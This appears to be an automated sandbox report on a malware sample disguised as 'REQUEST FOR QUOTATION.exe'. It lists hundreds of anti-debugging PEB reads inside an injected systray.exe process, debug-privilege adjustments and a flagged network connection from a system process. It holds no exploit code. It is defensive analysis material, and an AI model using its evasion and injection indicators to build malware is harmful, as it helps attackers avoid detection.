Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05268DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05236CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052714FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0528070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05271608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052346A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05280EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05237016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05284015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05284015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05272073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05281074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05233884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05233884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0524B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05285BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_052353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051D3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051C8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0526B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05288A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051F927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0527EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_05244257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051ED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051ED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051CAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051EFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_051E2AE4 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process token adjusted: Debug
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\systray.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

